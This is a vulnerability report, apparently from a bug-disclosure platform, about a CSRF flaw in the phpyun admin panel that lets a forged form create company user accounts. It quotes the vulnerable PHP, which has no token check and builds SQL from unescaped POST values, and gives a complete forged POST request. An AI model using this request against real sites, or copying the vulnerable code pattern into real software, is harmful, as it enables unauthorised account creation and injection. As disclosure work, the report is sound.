phpyun#csrf添加企业用户

漏洞作者:

Xser

详细说明:

出现在/admin/model/admin_company.class.php中

function add_action(){

		$rating_list = $this->obj->DB_select_all("company_rating","`category`=1");

		if($_POST['submit'])

		{

			extract($_POST);

			if($username==""||strlen($username)<2||strlen($username)>15)

			{

				$msg = "会员名不能为空或不符合要求!";

			}elseif($password==""||strlen($username)<2||strlen($username)>15){

				$msg = "密码不能为空或不符合要求!";

			}elseif($email==""){

				$msg = "email不能为空!";

			}else{

				if($this->config['sy_uc_type']=="uc_center"){

					$this->obj->uc_open();

					$user = uc_get_user($username);

				}else{

					$user = $this->obj->DB_select_once("member","`username`='$username' OR `email`='$email'");

				}

				if(is_array($user))

				{

					$msg = "用户名或邮箱已存在!";

				}else{

					$ip = $this->obj->fun_ip_get();

					$time = time();

					if($this->config['sy_uc_type']=="uc_center")

					{

						$uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']);

						if($uid<0)

						{

							$this->obj->get_admin_msg("index.php?m=com_member&c=add","该邮箱已存在!");

						}else{

							list($uid,$username,$email,$password,$salt)=uc_get_user($username);

							$value = "`username`='$username',`password`='$password',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";

						}

					}else{

						$salt = substr(uniqid(rand()), -6);

						$pass = md5(md5($password).$salt);

						$value = "`username`='$username',`password`='$pass',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";

					}

					$nid = $this->obj->DB_insert_once("member",$value);

					$new_info = $this->obj->DB_select_once("member","`username`='$username'");

					$uid = $new_info['uid'];

					if($uid>0)

					{

						$this->obj->DB_insert_once("company","`uid`='$uid',`name`='$name',`linktel`='$moblie',`linkmail`='$email',`address`='$address'");

						$rat_arr = @explode("+",$rating_name);

						$value = "`uid`='$uid',";

						$value.=$this->rating_info($rat_arr[0]);

						$this->obj->DB_insert_once("company_statis",$value);

						$this->obj->DB_insert_once("friend_info","`uid`='$uid',`nickname`='$name',`usertype`='2'");

						$msg="会员(ID:".$uid.")添加成功";

					}

				}

			}

			if($_POST['type']){

				echo "<script type='text/javascript'>window.location.href='index.php?m=admin_company_job&c=show&uid=".$nid."'</script>";die;

			}else{

				$this->obj->ACT_layer_msg($msg,9,"index.php?m=admin_company",2,1);

			}
 

没有验证 token，也没有验证 Referer（下面的请求包中虽然带有 pytoken 参数，但上面的 add_action 并未对其做任何校验）

因此存在 CSRF，以下为本地测试：



提交请求包

POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1

Host: 127.0.0.1

Proxy-Connection: keep-alive

Content-Length: 211

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0



rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type=
 

构造表单就可以csrf了



如图

12180358e642ca7d495d40cf6474fafcc6ad9c09[1]

成功添加

12180410e2b0dd328934ed8ce503e2bad21b8db4[1]

修改用户资料处也存在同样的问题，就不一一提交了，在此一并提示。
